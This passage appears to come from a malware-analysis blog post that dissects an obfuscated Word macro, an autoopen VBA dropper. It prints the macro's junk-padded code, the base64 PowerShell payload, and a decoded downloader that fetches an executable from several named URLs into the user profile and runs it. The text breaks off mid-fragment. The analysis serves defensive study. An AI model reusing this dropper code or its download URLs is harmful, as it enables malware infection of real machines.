374798480 - QiRhhNzX * Zi1zlbf * (rQFvilwM + WisWwbB))) Set iIElPCtQ = TRs4Y3kO n8DNvz = "kARQB" + "wAEgAa" + "gBqA" + "CAAPQA" + "gACgAJ" + "wA2ADU" + "AJwAr" + "ACcAN" + "AAnAC" kRwoCbw = 252124838 + Rnd(733842440 / ChrB(143597698)) * (zrcm1dc7 * CStr(R66WQprw) + (814240235 * 421383916 - v8pM0R * s7TAKbb * (FTzFB83t + Gh8Unn))) Set a7niLvBz = vMwNwAr IEn4iai = 707329075 + Rnd(651177826 / ChrB(528505509)) * (tdhpAcm * CStr(QWJu2F) + (923052425 * 748610456 - luiSzC * w4qsCDw * (wC5qL3M + ZJqVj8lV))) Set QKsnm1r = fTF8pt8 uAwdTGD5 = "kAOw" + "AkA" + "G0AVQ" + "B1AFc" + "AZABG" hR1ASs = 593608699 + Rnd(869856326 / ChrB(837772827)) * (Z9pw547F * CStr(Oba2Po) + (194804751 * 17052920 - MTIQlW * fT0E0I6 * (qz1VPb + raJDDY1))) Set aLzZLi = YUKNcR7 oFpG4cU = 69902081 + Rnd(459111931 / ChrB(375063880)) * (C9Lqznb * CStr(KruAUNws) + (450570844 * 750939523 - j3VIiK3 * u8Utizp8 * (nOjkY6F + cVAmuD))) Set rhSciV = mZR1aH IUwbv9 = 441358395 + Rnd(41993444 / ChrB(359464561)) * (pURjMl * CStr(ch2BLD) + (654196984 * 501767774 - c60wvXm * F4n707bn * (QjiU2bn + fYHdGr))) Set NAj45z = J4k2FtZd LOw02E5 = "AD0A" + "KAAnAF" + "IAM" + "ABhAHE" + "AJwA" + "rACcAM" + "QBsAD" + "AAJw" + "ArACc" FYW8JAh = 712619214 + Rnd(881693387 / ChrB(636295992)) * (URKaKmN * CStr(I3ZUT71W) + (250299522 * 589413664 - YMSLPFs * RpIzFY * (VFHNi7j + rErVnCm))) Set E3P6hfZ1 = OiOiBr QA3fwJH = 424424867 + Rnd(823210062 / ChrB(264615348)) * (PK2s3Pl * CStr(wzSnDq) + (307425369 * 580047337 - BwAi5hfG * oacfXKo * (PjwUaV + ttdw1Oj))) Set Pq8LWI97 = TzQ3C9i z2dUJc = 561984218 + Rnd(486723199 / ChrB(654304715)) * (G4FY1Mf2 * CStr(Nu5i9u) + (918391916 * 340744218 - fUdkQY * jcwnuD9 * (S73tN5I + dwLsnJ))) Set MwaiHbj1 = TmA1juPi UaU4Jz1 = "ATwA" + "nACkAO" + "wAkA" + "GQA" + "RwB" + "CAFQAb" SlNj2znD = 904942248 + Rnd(601296404 / ChrB(231547769)) * (WoJpiW * CStr(L7O7SCFY) + (378312373 * 859886211 - dIowCo * dOZvBIG * (GQAdsH + diwhojtH))) Set P0Xm5CP = bc6K78WP sQzrsWma = 528335493 + Rnd(650487598 / ChrB(597667683)) * (GFWid6z * CStr(lq6rtk) + (534848929 * 916008907 - CXJSTGw7 * QJWWlsmX * (crCjiIwB + ulzrDJ))) Set Cbq9808i = FA9JOLV v0o9zrXQ = 888537584 + Rnd(578349292 / ChrB(526518202)) * (D7ApwdLv * CStr(fa5jw5) + (486628947 * 80837732 - VwIbDiP3 * nItkf3 * (rkQ8D1C + JkVYiNzb))) Set cmPNTs2Y = RA52CPsj mLUvTz7 = "AA0AHE" + "APQAk" + "AGU" + "AbgB" + "2ADoAd" hXzdGE5 = 622752920 + Rnd(4143555 / ChrB(374439290)) * (wQW55V * CStr(GfZRfAE) + (958997563 * 351471992 - WVoA2VV5 * wSk7LHjV * (zVsdI8 + E07QKdWw))) Set ZjjbRs = rVT3im wvptmnk6 = 494575016 + Rnd(560361141 / ChrB(299099691)) * (wPhh76N * CStr(VZrGTiiw) + (189766578 * 256872344 - WwEb9f * fJcubQj * (WGZBJW + aUCWqW))) Set TfadG8Z = KQ78pD nJIQQcw = "QBzAG" + "UAcgB" + "wAHI" + "Abw" + "BmA" + "GkA" uHrvLhk = 960064732 + Rnd(529986537 / ChrB(131783534)) * (wbjjomz * CStr(zGwzSZ) + (781269897 * 555111492 - JW3Vtaj * NnvzJ3UB * (iuqFX5B6 + GzZmhWGF))) Set GITw8lNT = wYjjO1iQ MYuj56 = 665417865 + Rnd(256782902 / ChrB(345597011)) * (b5mZmpc5 * CStr(DHqRPr) + (856571112 * 941873976 - FXzQ8Ui * CMwdv3 * (QGUvjU2 + DRpOwT))) Set rKFWcRKh = DPn6Zh mnhC8GqR = "bABlAC" + "sAJwB" + "cACcAK" + "wAkAEk" + "ARQBwA" + "EgAa" + "gBqAC" + "sAKAAn" DzENLYi = 297625587 + Rnd(720768655 / ChrB(476796187)) * (pHlJsr * CStr(qObpku24) + (807596303 * 458000434 - Snjt2v * v8MIj15b * (wz05kzW + WhliQMI))) Set f2R7EJ = BTFt1afP RI79ZA = 460723157 + Rnd(627391298 / ChrB(588236318)) * (EwL6JUmM * CStr(JMAjd8) + (760995623 * 634702389 - Cs3nJv4v * SGZHkLY * (aiAZ9J7 + wCr0Sh1))) Set cwXa1dGw = t9SjQHwY WCrXbI = "AC4A" + "ZQA" + "nACs" + "AJwB4" + "AGU" + "AJwAp" + "ADsAZ" + "gBvA" + "HIAZ" Mnv94H = n8DNvz + uAwdTGD5 + LOw02E5 + UaU4Jz1 + mLUvTz7 + nJIQQcw + mnhC8GqR + WCrXbI End Function Function Qd66bAu() On Error Resume Next foWb2Kp = 873066267 + Rnd(825404028 / ChrB(979149400)) * (i15WVz5 * CStr(sLSsNo) + (787551009 * 7545040 - dR4cZjAJ * EcPn1jFS * (dFQdudDs + u2cE8Tr))) Set rVnLF0Y = tnjiabV BaN2AfUq = 661456499 + Rnd(670569176 / ChrB(166004269)) * (FQSF3Bz * CStr(kjRkTK) + (941750314 * 233680561 - Xq8iPw * zNpcEFtH * (Ddi164so + KKuaXBD))) Set lDQpKz = NiM1MMF l7cRfN7 = "QBh" + "AGM" + "AaAAo" + "ACQATQ" + "A4AF" + "UAMQB6" LailsNz = 406987825 + Rnd(654056395 / ChrB(861486049)) * (cqtrs0W * CStr(cVjO1ucj) + (265847283 * 758795270 - RaUfwU5X * SRtdn5d * (sHcqFBW + RzYGKzN))) Set K5pcoWN = ZWHiGl YLPlBQWh = 809818160 + Rnd(951890865 / ChrB(40140484)) * (oZjODsvK * CStr(YVTHTmlq) + (605883735 * 987514461 - pFJ2aT * iwNXno5 * (rAzLNv + GD6MQatl))) Set WEMRc1p = H7iprUdw tuOdbcb = "AHcAI" + "ABpAG" + "4AIAAk" + "AFA" + "AZgB3" + "AEgAYw" + "BYAFoA" + "UwApA" + "HsAdAB" sIT87uTH = 469676144 + Rnd(55099057 / ChrB(842554649)) * (iN0OCP0 * CStr(Q1LtS3Cz) + (436493985 * 345713109 - XmHhWuPz * LwsjBhp * (MOAzdwN + EnminkN))) Set kpfuwNum = o1iKG5 Fv52Ui = 275681568 + Rnd(770884464 / ChrB(393266725)) * (KUoTYls * CStr(rRAkOBA4) + (258308706 * 921694968 - EiBwM3t * TVTNEwD * (ZiJQZzv + PiXfdfC))) Set jjMt0nTd = TJM8nsbz pouJSzs = "yAHkA" + "ewAk" + "AEoARw" + "BUADkA" + "aQBZ" + "AE8AY" cRX82v = 19892619 + Rnd(293320422 / ChrB(874125705)) * (QYfzpw * CStr(KdAvmLl9) + (697346982 * 879664904 - lu7VIf8 * r2Iw2vm * (U0BN7mjj + NwTZMDYi))) Set kK1VHV = zvZ97wiq JinbBIrj = 374051741 + Rnd(551264155 / ChrB(266061981)) * (QOKuQD * CStr(mGEZjjl) + (755729742 * 934633056 - ohr4wXK * LzGc3Q * (BXQWiEa + BbiGwb2))) Set dlUYWG = X60mhT RwmuL9zj = "gAuA" + "EQAbw" + "B3AG4" + "AbA" + "BvAGEA" + "ZABGA" + "GkAbA" iZUGWi = 558728469 + Rnd(671739561 / ChrB(884179563)) * (V4Flvt * CStr(Rw6ztKIF) + (805894080 * 147955897 - zwWiVA * bmOqqfLC * (kJ7Y8Rp + zOcujRj))) Set bhPuUFU = MHO9Gob JjbEhIw = 492205395 + Rnd(310280451 / ChrB(766429482)) * (lWqJiv8o * CStr(YivLBnzp) + (372617296 * 841950712 - Asvsjbc * hbfarEp * (B3baG3 + FKonY6L))) Set wYvPfL7 = GPuUjKdL d1E4tZ = "BlACgA" + "JAB" + "NADgAV" + "QAxA" + "HoAd" + "wAsA" + "CAAJ" JnLUnj = 175000718 + Rnd(823347353 / ChrB(659168783)) * (CQ4isoba * CStr(DMwNB1) + (509079383 * 609501128 - w39cw9Gj * pqPK9dFb * (oAaQHaWG + iN3YwKRa))) Set c6IaPY8o = nEv756c hht2zDQ = 597386587 + Rnd(601919816 / ChrB(978791791)) * (U6kihkhD * CStr(MDCKGLQ) + (320740386 * 355634144 - PLSQ9i * l4mwtLZ * (Y5GLiDSp + zFURm2uG))) Set LjCAjQ = OS9rTf1 vH2kmI2X = 533198944 + Rnd(97573349 / ChrB(622189184)) * (zt1SwVI * CStr(Wr3RzRZ) + (780174646 * 240798078 - WMaI9kh * mUth5p6N * (SdjiqJsV + wu2uF8w))) Set QMzZnqG9 = GWLAijA zPOMJu0d = "ABk" + "AEcAQ" + "gBU" + "AGwA" + "NABxA" + "CkA" + "OwAk" + "AE8" + "ARA" KUHwVWW = 626702085 + Rnd(83132343 / ChrB(884812614)) * (vvTvMh * CStr(zbwz1J) + (196571569 * 922203237 - ihWwz9 * ci7avnc * (jXoQkU + mjU9LKb))) Set LYsF8UOm = RfqLU6 EzYf7w0G = 942368426 + Rnd(199438054 / ChrB(493369092)) * (YHMNOJCJ * CStr(KtkS7ccN) + (530972519 * 517759448 - sKjCHCz * TpBdzC8 * (sqs4Lw + Boi08Dk))) Set BoMBAV = rEjwHZ k5f1VdNJ = 393173748 + Rnd(987728499 / ChrB(109487686)) * (CslSFQ3 * CStr(mJXn99G) + (182909226 * 319767467 - RlqXjfq9 * wv1bjTN * (ZXIQKVd + MCNpjcO))) Set Mtjk5G = UjLYp3so SfBGzL = "B6AEQA" + "SwA5AD" + "MAPQA" + "oACcA" + "ZgAn" + "ACs" + "AJwBqA" p7jplv = 927701276 + Rnd(852753459 / ChrB(400750473)) * (owtbaHVS * CStr(Jj8DJ9) + (808919948 * 872694240 - NVjqCi * wCwvIvj3 * (iM2nJBm + fcwH9UL))) Set LDY2kbU = VYLdQO HQnPzR = 185535274 + Rnd(58755511 / ChrB(765192252)) * (QfSWOz * CStr(i1LRjbQO) + (873745759 * 907176767 - YfUBZS * svLmH1O * (p7XPUqO + FzhDTJZm))) Set JQ76dd9z = IqMkoE8 JnMhEm06 = "EgAegB" + "EAGwA" + "cAAnAC" + "sAJwA" + "1ACcA" KuS56sp = 129935722 + Rnd(414094266 / ChrB(334228970)) * (qLfZsF * CStr(c7AMrS) + (568007474 * 168984552 - FuCQuatW * tvBjn9ER * (UWjY4Qu + jJfAkN))) Set caEpVj = p6bisO NE08P60 = 698735385 + Rnd(171835498 / ChrB(902622668)) * (IQQNiXz * CStr(GUMOlR) + (869004564 * 112885696 - tujsZ0 * Ul1WjSWK * (iDN8nmI + lnnHkBmF))) Set c2NDmbA = q42blTcF WuLoWdq = "KQA7A" + "EkAZgA" + "gACgA" + "KABHA" + "GUA" + "dAA" + "tAEkA" + "dABlA" + "G0AI" t2svhnEN = 428199590 + Rnd(411213609 / ChrB(561911674)) * (Qz79TVb * CStr(mEj4MB) + (893078066 * 512241062 - PsvtD0Va * UffQkBr * (kKC1wGn + WCT5IsV))) Set F4095mc = dQTKUa Eph75PR = 869271806 + Rnd(219077211 / ChrB(380424824)) * (h42QnSE1 * CStr(jqbc7v) + (574601309 * 642538064 - qB8jBH8w * ziXfVp * (rMKRJvD + WTjSjZY))) Set wVOfUSm = GT7HQN YztVwWuD = 377513235 + Rnd(519152519 / ChrB(787867678)) * (z3HGUbUi * CStr(ASm3i0Di) + (738743664 * 643737779 - ntIb6Kz * ECfdwltE * (PQ4tCK + DT8DFl))) Set U83fJv = wQGYtY d6H2AFR = "AAkA" + "GQARw" + "BCAF" + "QAb" + "AA0AHE" + "AKQAuA" + "GwA" Qd66bAu = l7cRfN7 + tuOdbcb + pouJSzs + RwmuL9zj + d1E4tZ + zPOMJu0d + SfBGzL + JnMhEm06 + WuLoWdq + d6H2AFR End Function Function misB743q() On Error Resume Next ojs15m = 259784895 + Rnd(468663839 / ChrB(339892782)) * (qJMs3z0q * CStr(YbKw1Vs) + (478243774 * 253321315 - lsWRtoj3 * n9UwvHw * (zjUrTEh + Oh0F23))) Set raJIcwp = Y1BFO7tz ukwtj7G5 = 441979621 + Rnd(845842613 / ChrB(568569952)) * (XMQ3ROD * CStr(Ttp8bTj) + (915279226 * 989126002 - Snqn53T * tXvGkB * (c7KWoV + DiiwUj))) Set oIwjm8Z = tpA8jXZR ADNMmcl = "ZQBuA" + "GcA" + "dABo" + "ACAA" + "LQBn" + "AGUA" + "IAA0AD" + "AAMA" + "AwA" z4fIozif = 264614520 + Rnd(689262174 / ChrB(572433491)) * (iNG0Gw * CStr(ATUkb5fn) + (740258210 * 875099145 - ZY2aciqU * W3XM7Qc * (i1A7kL + t03jw7))) Set NWphmIXw = WNP9OLDo ajV4kic = 445625547 + Rnd(60789641 / ChrB(432890347)) * (rWjRGbrs * CStr(CGkZSh) + (119366005 * 280821196 - kf5C0b * Jza1wbfB * (ZBjWJQhO + N5UwY9))) Set XdSo0t = qMUJ5QJ dUWofu = "DAA" + "KQA" + "gAHsAS" + "QBuA" + "HYA" ZhoDZbOv = 962213343 + Rnd(917990298 / ChrB(325079150)) * (cdRkXQjR * CStr(CaoTJl) + (786113072 * 689918715 - NwhiqGaf * wmp88U * (Yudc7cm + GFJKOzih))) Set p5RzBVRF = jWwqMNuQ kpKRjJ = 311135869 + Rnd(114101750 / ChrB(744369689)) * (jOhNwQWz * CStr(BlOzk14) + (434540199 * 973074445 - BwJProA * El3zk7 * (lvd0Krp + Z7TZqviV))) Set U8HmWXQ = lZMn8hr sEdLvJE = "bwBrAG" + "UALQB" + "JAHQA" + "ZQBtAC" + "AAJA" + "BkAEc" hYriXp = 3547945 + Rnd(94664314 / ChrB(242330258)) * (qKGLMC * CStr(awvHwWqS) + (902210241 * 375505551 - zvsYwz9W * bzT0mCv * (iYFOV2Q6 + TGszWQCb))) Set SEBN2Q9 = noj6jzW4 YDuiwZ = 254937817 + Rnd(430679092 / ChrB(874277840)) * (PdnmHw * CStr(EuFkkR5Z) + (1270322 * 713562678 - BvtZmiB * h2hIni * (InNOYd + ZJR3APs))) Set DjuOAj = tb3hb8 wbPpmKGi = 604694031 + Rnd(271130817 / ChrB(703287287)) * (aXnCkCJ * CStr(tjE0zoq8) + (87529262 * 578769563 - WjVoTEC * qVzjbWk * (rm6Oitkm + tnLHT3E))) Set TR8G7M = NdYRFK d5wpXhz = "AQgBU" + "AGwAN" + "ABxA" + "DsAJAB" + "jADcA" + "agBp" + "AFEAMw" + "A9ACg" s3YKFDEz = 27029413 + Rnd(550064100 / ChrB(431289624)) * (Vrjk1If * CStr(hGq4iib) + (582551148 * 787601316 - aYpJK9p * kHjNX7Zk * (JSwXOSdM + Sbvzz4B))) Set V3d1Iwj = amF2Czc f87WEh4 = 807911768 + Rnd(44152535 / ChrB(221089631)) * (Bm3kGP * CStr(tKqAWUu) + (520858982 * 692255487 - kT91C5qG * Z9F99Iq * (hFoIdbQ + mwXHVRTs))) Set rqZJczXL = TLDvKC W1qwKF = "AJwB" + "3AG" + "kAJw" + "ArACc" + "AZA" + "AyAFo" + "AVw" + "BZAC" + "cAKQ" misB743q = ADNMmcl + dUWofu + sEdLvJE + d5wpXhz + W1qwKF End Function Function SvYi5Y() On Error Resume Next Qar3FUa = 455660881 + Rnd(479377581 / ChrB(913763670)) * (A3z8Rh * CStr(pNuA25) + (186645371 * 372560310 - DBLqOi * mh4wbX * (HTTjUaYs + irBLID))) Set rRDToVs = HVAvWDHu LFSbAYGY = 800434914 + Rnd(510784388 / ChrB(882020659)) * (H1QaWB * CStr(GbmhZi1) + (618397161 * 606005729 - YfC4ZL * Z3tBSa * (jvScVUW + j5k4PwM))) Set tnG71PK = jYZTGT4 UAZpHEhA = 935091417 + Rnd(677220105 / ChrB(173746982)) * (ZQl4El2b * CStr(AKWqwV) + (329430195 * 691723933 - wfqVE8VL * VHzSVIw2 * (wOW0Yi + npl0X43))) Set NwHQqXS = TDUojdbd B6II8P = "A7AG" + "IAc" + "gBl" + "AGE" + "AawA" + "7AH0" + "AfQ" RJLo0A = 811400454 + Rnd(956707359 / ChrB(342546818)) * (DsGVHwws * CStr(ioAmQUU) + (61676991 * 885722845 - aPGOXNan * DXGLBPET * (iM5ufK + ii4cWFic))) Set mkYFjf = vbOEPu kim6Ji8 = 604995466 + Rnd(187162849 / ChrB(369192227)) * (iI8XbmjC * CStr(Xa5S9V) + (778068471 * 817724678 - wbKimLd4 * bvPmUI7b * (kIHmCM + blzWlD4J))) Set mPIpdpi = O8zZVj ZIYasqvd = 362165474 + Rnd(112544498 / ChrB(383572899)) * (nmW4itI * CStr(rDLJBSzM) + (558171835 * 594087418 - wv6pzluN * i5Y4RRq * (BFwSVOj + hJiwuXz))) Set LvHYina = mHBifn FckbN7Qj = "BjA" + "GEAdA" + "BjA" + "GgAe" + "wB9AH" + "0AJ" + "ABPAHE" + "ASwB" Wzt9cQif = 664813073 + Rnd(931017087 / ChrB(602680043)) * (mpsMhE * CStr(PdmsLohV) + (633491023 * 530973899 - pMoFnk * MbqZ60ij * (I2j0JV + OmBJBY))) Set XhAmj8zk = pMwMJ8qV OjUC9q = 619911867 + Rnd(191324940 / ChrB(505764206)) * (QOzGf2X * CStr(znHzzKS) + (142403242 * 793628068 - anj1Msh * shtziQc * (t7FndL + cOwXdYL))) Set jr94wToO = vRShsn1 pDT9WTn = "3AGQ" + "AcAA" + "9ACgA" + "JwBYAE" + "4ASwA" + "nACsA" + "JwBYA" WuD7X5zT = 493945759 + Rnd(137050478 / ChrB(960794521)) * (rjIzhB * CStr(c1aPhEu) + (584875022 * 501993385 - h4I7Ei * CbIYidGF * (LoUsS35m + rFt0dp5G))) Set DTwEiMZ = ob9d1RA8 Zwjr6fQV = 830631645 + Rnd(438680916 / ChrB(453945522)) * (Y7JEZ0T * CStr(K7vp8Q1) + (730843367 * 316482153 - MBo85j * MozEwp8o * (wIYK3k + Nh0fGHHK))) Set OLJzmmV = t8A0mNn ItmtPo = 144370194 + Rnd(885973332 / ChrB(472537641)) * (bj1Lo3D * CStr(VQowE4Dj) + (120093318 * 738763736 - QZBEArQ * otjRFjB * (sqw7w5Ez + imvt5wN))) Set GnLzRhnj = zUBJP3Q EIEU9Tz = "EUA" + "SwAnA" + "CkAO" + "wA=" SvYi5Y = B6II8P + FckbN7Qj + pDT9WTn + EIEU9Tz End Function Sub autoopen() On Error Resume Next WYG01Emi = 627136152 + Rnd(703507320 / ChrB(92536584)) * (znW1sqYh * CStr(HHdzi9u) + (628984380 * 336072048 - DZrq5rib * Owc3Vz * (wIbP78 + ODj3Eu0))) Set MoJz04FZ = SB6NK0bY z5oTLD = 599329029 + Rnd(451456318 / ChrB(19258986)) * (UO7VOQ * CStr(nGUHt77) + (440806034 * 738022724 - d6BQD1Q * b2wiEM * (wvwI7D + iz5WPl))) Set cvOW94 = NC25UzDh Trwctot = 581744880 + Rnd(558079707 / ChrB(322360018)) * (SvHPuK * CStr(Zk1MQqQz) + (66927396 * 951667606 - h5vLqtYs * wGnj2K * (Gj9DFz1 + CX6flU))) Set XA6jBv3 = huirzFA pjs7kH = rkw8UGh + Chr(fUvcLZ + FzFXsJGB + KeyCodeConstants.vbKeyP + www5Vz + YiZjZuT + W6J5smt + LECJDVzi) + oHPUlXj + H69wWw4D + bOXYcQd ccVZ5B = 660827807 + Rnd(960868094 / ChrB(117019020)) * (E4DLNP * CStr(fiiGc1mj) + (674990587 * 757028956 - UAwdii * sn98VAT * (DKooza + S4jSc0))) Set o6FEjqsh = zjhvbjPT cH95iKG = 302472438 + Rnd(264864397 / ChrB(286542331)) * (WssUjwUr * CStr(IVBYFtF) + (506547179 * 128201286 - hwX0P08T * Anzwnj * (Vzvc58 + IEWNvJpw))) Set RVRzXYLi = MmbJdYrr GGS8A1j = VWWz37nX + Chr(AtOQwkZX + vnhmNtWc + z6950fb + lQms5M + KeyCodeConstants.vbKeyO + n5ilbt + uBZASZtT + v6tRjLX) + bwVq6p + JrQtnG3 + DPVWUZ + zl5pfX + QWtO0w QzDwRKFi = 146327714 + Rnd(234342030 / ChrB(575897316)) * (O1d4qfl * CStr(iZWNw4mD) + (16669287 * 24485372 - kkuIWP * z0awzo * (A4MRTl + XDVM2FN))) Set KjQtuUQ8 = i0jaK0kD tOpczq = 703904372 + Rnd(240430333 / ChrB(122288507)) * (HzUlrpKi * CStr(KC2hWwGz) + (969991852 * 231469119 - EYOQLRUp * zH8qfdpn * (SWqLw5b5 + HnIUu7W))) Set uO3fcGt = OnJUlidr T6EzHmvQ = 401572651 + Rnd(793195745 / ChrB(902715424)) * (M7p7qOVR * CStr(B5aUnKw) + (848796452 * 199707633 - jS0BpBG * HzXtqOM * (fIqBjC + OHFm7rkb))) Set i5ANPu0 = bqnY96 DsiufjK ikw8I0t + pjs7kH + GGS8A1j + KHwRElj7 + wCPzWAns + F0wA2rw + UOiYERH + B8waSCi + BIBrlzL + wBuzmLiw + Mnv94H + Qd66bAu + misB743q + SvYi5Y, 125713 - 125713 MSD84f = 74722115 + Rnd(618328723 / ChrB(812588121)) * (DIwVYJ * CStr(SmTkHi) + (453673570 * 603260537 - HPfnkh * irj1E5Rk * (j0L2oXoX + wcb4qXop))) Set cOcriqb = VShRh6X J1XHvVB = 353202910 + Rnd(702104841 / ChrB(847006653)) * (cFUCzPjE * CStr(o9Vsnp) + (742374002 * 489394143 - Wbil7ijm * DfdRJp * (ikD2EA + oDrVlNY))) Set FktGUt5 = FQiDj8f zjhzksl = 18464130 + Rnd(994433919 / ChrB(158754862)) * (Yk10T9O * CStr(fJKhnoPi) + (948797985 * 867038795 - shcU5jd * N1wiwiz * (uwLwYX + zEVjCS))) Set fDXpYc = GUSW91G End Sub
So trying another tool out that I have been playing with a lot (ViperMonkey from Decalage2: http://github.com/decalage2/ViperMonkey) yielded the breakdown of the script with the code being encoded in base64 as seen below:
JABIAEwAMwAzAFIAQwBSADAAPQAoACcASwB2ACcAKwAnAGQATAAnACsAJwB1AHAAcgAnACkAOwAkAEoARwBUADkAaQBZAE8AYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABQAGYAdwBIAGMAWABaAFMAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwBkACcAKwAnAGEAJwArACcAZABhACcAKwAnAGYAYQByAGkAbgBnAG8AcwAnACsAJwB0AGEAcgAnACsAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAcgB0AFEAdwBUACcAKwAnADUAJwArACcANQB6AEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBmAGkAJwArACcAbABlACcAKwAnAC4AbABhAHUAYQBzAGkAbgBoAC4AYwBvAG0AJwArACcALwAnACsAJwBQACcAKwAnAFgAZQBoAEwAJwArACcAUAAnACsAJwBQAGwAQAAnACsAJwBoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvAGEAJwArACcAbgAnACsAJwBnAGkAcgBhAHMALgAnACsAJwBvAHIAJwArACcAZwAvAHgAJwArACcAOABCACcAKwAnAGoAYQBNACcAKwAnADQAJwArACcANAAnACsAJwA0AEkAQABoAHQAdAAnACsAJwBwACcAKwAnADoALwAvAGEAZABzAHUAaQBkAGUALgBjAGwAJwArACcAdQBiAC8AeQAnACsAJwA3ACcAKwAnADcAUQBUAEsAaABWAEAAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBtAGkAYwBoAGEAZQBsAHcAcgBpAG4AZwBsACcAKwAnAGUAJwArACcAcgAuAGMAbwAnACsAJwBtAC8ASQBSAFkAWQAnACsAJwBxAFAAYgA1ACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAaQAwADUANQBhAGwATwBQAD0AKAAnAHQAcABZAEUAMgBvACcAKwAnAG0AMQAnACkAOwAkAEkARQBwAEgAagBqACAAPQAgACgAJwA2ADUAJwArACcANAAnACkAOwAkAG0AVQB1AFcAZABGAD0AKAAnAFIAMABhAHEAJwArACcAMQBsADAAJwArACcATwAnACkAOwAkAGQARwBCAFQAbAA0AHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkARQBwAEgAagBqACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATQA4AFUAMQB6AHcAIABpAG4AIAAkAFAAZgB3AEgAYwBYAFoAUwApAHsAdAByAHkAewAkAEoARwBUADkAaQBZAE8AYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABNADgAVQAxAHoAdwAsACAAJABkAEcAQgBUAGwANABxACkAOwAkAE8ARAB6AEQASwA5ADMAPQAoACcAZgAnACsAJwBqAEgAegBEAGwAcAAnACsAJwA1ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGQARwBCAFQAbAA0AHEAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEcAQgBUAGwANABxADsAJABjADcAagBpAFEAMwA9ACgAJwB3AGkAJwArACcAZAAyAFoAVwBZACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHEASwB3AGQAcAA9ACgAJwBYAE4ASwAnACsAJwBYAEUASwAnACkAOwA=
Once I decoded that, I got the following:
$HL33RCR0=('Kv'+'dL'+'upr'); $JGT9iYOb=new-object Net.WebClient; $PfwHcXZS=('h'+'tt'+'p:/'+'/d'+'a'+'da'+'faringos'+'tar'+'.'+'c'+'om/'+'rtQwT'+'5'+'5z@'+'http'+'://'+'fi'+'le'+'.lauasinh.com'+'/'+'P'+'XehL'+'P'+'Pl@'+'htt'+'p'+':'+'//a'+'n'+'giras.'+'or'+'g/x'+'8B'+'jaM'+'4'+'4'+'4I@htt'+'p'+'://adsuide.cl'+'ub/y'+'7'+'7QTKhV@h'+'ttp'+'://michaelwringl'+'e'+'r.co'+'m/IRYY'+'qPb5'+'N').Split('@'); $i055alOP=('tpYE2o'+'m1'); $IEpHjj = ('65'+'4'); $mUuWdF=('R0aq'+'1l0'+'O'); $dGBTl4q=$env:userprofile+'\'+$IEpHjj+('.e'+'xe'); foreach($M8U1zw in $PfwHcXZS){try{$JGT9iYOb.DownloadFile($M8U1zw, $dGBTl4q); $ODzDK93=('f'+'jHzDlp'+'5'); If ((Get-Item $dGBTl4q).length -ge 40000) {Invoke-Item $dGBTl4q; $c7jiQ3=('wi'+'d2ZWY'); break; }}catch{}}$OqKwdp=('XNK'+'XEK');
So now I know the sites that this was calling out to, and where the file was being dropped, but it still doesn’t answer my question about how it gets re-assembled. So went back to what I could figure out from the oledump output mentioned above. Skimming through it, there was a pattern to it (every 4-6 lines was junk code and then a variable being assigned to other random named variables while being concatenated), but I was not 100% sure if my “gut-feeling” was correct. That was until I saw the following line in the script:
QX0ipWjQ = "wersh" + "ell -" + "e J" + "ABIAE" + "wAMwA"
I could see the beginnings of the Powershell script in that one line. And since this one line kind of married up to my “gut-feeling,” I started to strip out the junk code. Once that was done, and some further cleaning up of the script was performed, I was left with this:
Attribute VB_Name = sKfw6m Function DsiufjK(rPP1jAE, wToiPvr) Shell (rPP1jAE + iJf1R0 + jG4Ranf + rppKckZK + oM1fQI + nRaN1qpw), l6dXY99 + qnul14Cw + wToiPvr + tzKhPcU + tm0T1td + zEB7op End Function Function UOiYERH() On Error Resume Next QX0ipWjQ = wersh ell - e J ABIAE wAMwA qYGMCi2F = zAFIA QwBS ADA APQAoA CcAS ZzzVfP = wB2 ACcAKw AnA GQATAA nACsAJ wB1AHA AcgAnA CkAOwA kAEo zVCl3I58 = ARwBU ADk AaQBZ AE8A YgA9AG 4AZQ B3AC 0AbwB fcsnuE = iAGo AZQBjA HQAIAB OAGUA dAAu AFcA ZQB iAEM cNsVZwis = AbA BpAGU AbgB0A DsA JABQAG YAdwBI AGMAW SomS25ZG = ABaAF MAPQ AoACc AaAAn ACs AJwB0A HQAJw ArACcA GNc88i = cAA6A C8AJwA rACcAL wBk ACcAKw AnA UOiYERH = QX0ipWjQ qYGMCi2F ZzzVfP zVCl3I58 fcsnuE cNsVZwis SomS25ZG GNc88i UOiYERH = wershell-e JABIAEwAMwAzAFIAQwBSADAAPQAoACcASwB2ACcAKwAnAGQATAAnACsAJwB1AHAAcgAnACkAOwAkAEoARwBUADkAaQBZAE8AYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABQAGYAdwBIAGMAWABaAFMAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwBkACcAKwAnA End Function Function B8waSCi() On Error Resume Next mm44hw = GEA JwA rAC cAZA BhACcA KwA o8NUEiH = nAG YAYQBy AGkAb gBnAG8 AcwA nACsAJ jzYz573 = wB0A GEAcgA nACs AJwAuA CcAKw AnAG MAJwAr ACcAb J6EaO6 = wBtAC8 AJw ArA CcAcgB 0AF EAdwBU woo96Zz6 = ACcAK wAnADU AJw ArACcA NQB6 AEAA zpfFBH = JwAr ACcA aAB0AH QAcA AnACs AJwA6 AC8ALw AnACsA bOIDQsaj = JwBm 